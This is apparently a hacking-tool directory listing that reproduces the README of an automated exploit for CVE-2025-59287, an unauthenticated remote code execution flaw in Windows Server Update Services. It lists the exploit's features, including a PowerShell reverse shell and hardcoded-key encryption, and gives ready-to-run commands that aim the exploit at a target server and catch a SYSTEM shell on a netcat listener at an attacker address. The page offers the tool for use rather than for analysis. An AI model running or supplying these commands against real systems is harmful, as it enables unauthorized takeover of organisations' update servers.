Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-59287 — Automated exploit for CVE-2025-59287, an unauthenticated RCE in WSUS, featuring payload generation, reverse shell listener, and AES encryption with hardcoded keys. | Kitploit
Tools/GitHubGitHub/garvitv14/cve-2025-59287
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Automated exploit for CVE-2025-59287, an unauthenticated RCE in WSUS, featuring payload generation, reverse shell listener, and AES encryption with hardcoded keys.

View Repository
1625710 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-59287 WSUS RCE Exploit

Automated exploit for Windows Server Update Services (WSUS) unauthenticated remote code execution vulnerability.

Vulnerability Details

  • CVE ID: CVE-2025-59287
  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network
  • Authentication: None required
  • Impact: Remote Code Execution as SYSTEM

Features

✅ Fully automated payload generation
✅ Auto-downloads ysoserial.NET dependency
✅ Built-in reverse shell listener
✅ Cross-platform support (Windows/Linux/Mac)
✅ AES encryption with WSUS hardcoded keys
✅ PowerShell reverse shell payload

Requirements

pip install -r requirements.txt

Python Dependencies

.NET Runtime (Auto-detected)

  • Windows: .NET Framework (built-in)
  • Linux/Mac: Wine or Mono Ubuntu/Debian

sudo apt install wine-stable

sudo apt install mono-complete

Installation

Clone or download exploit files

cd CVE-2025-59287-exploit

Run exploit (auto-downloads ysoserial.NET)

python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444

Usage

Basic Exploitation

python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

if want session on another listener

Terminal 1: Start netcat listener

nc -lvnp 4444

Terminal 2: Run exploit without built-in listener

python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

Download Tool